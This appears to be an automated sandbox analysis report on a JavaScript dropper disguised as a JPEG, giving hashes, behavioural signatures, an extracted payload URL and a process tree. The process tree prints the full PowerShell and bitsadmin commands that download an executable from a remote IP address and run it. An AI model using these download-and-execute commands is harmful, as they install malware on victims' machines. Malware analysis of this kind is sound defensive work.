Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
25-08-2024 16:40
Static task
static1
Behavioral task
behavioral1
Sample
c126d9b909d774a177d560de530aea04_JaffaCakes118.zip
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
c126d9b909d774a177d560de530aea04_JaffaCakes118.zip
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
PIC176174.jpg.js
Resource
win7-20240705-en
General
-
Target
PIC176174.jpg.js
-
Size
650B
-
MD5
a7ab035cbabbaa850b95e1eb8c877789
-
SHA1
1175c71d4e70591c3816292fd9107486a7fb3bbe
-
SHA256
a84be445b2a8be5ed37e7d23816293f15ba5acec72fde6e77d59db4832eace48
-
SHA512
7189b836a35309cc29acadfb3ed9bb915db1adb47780b70c1ec44ab308d46eaebdc1ab1fae7a460d437f47fef781c0a4d7d9c4e025f7de6e0952b21d792c1854
Malware Config
Extracted
http://217.8.117.63/tspam.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 2364 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2364 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2364 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
wscript.execmd.execmd.exedescription pid process target process PID 2500 wrote to memory of 2340 2500 wscript.exe cmd.exe PID 2500 wrote to memory of 2340 2500 wscript.exe cmd.exe PID 2500 wrote to memory of 2340 2500 wscript.exe cmd.exe PID 2500 wrote to memory of 2968 2500 wscript.exe cmd.exe PID 2500 wrote to memory of 2968 2500 wscript.exe cmd.exe PID 2500 wrote to memory of 2968 2500 wscript.exe cmd.exe PID 2340 wrote to memory of 2364 2340 cmd.exe powershell.exe PID 2340 wrote to memory of 2364 2340 cmd.exe powershell.exe PID 2340 wrote to memory of 2364 2340 cmd.exe powershell.exe PID 2968 wrote to memory of 760 2968 cmd.exe bitsadmin.exe PID 2968 wrote to memory of 760 2968 cmd.exe bitsadmin.exe PID 2968 wrote to memory of 760 2968 cmd.exe bitsadmin.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\PIC176174.jpg.js1⤵
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe&start C:\Users\Admin\AppData\Local\Temp\558392.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe3⤵
- Download via BitsAdmin
PID:760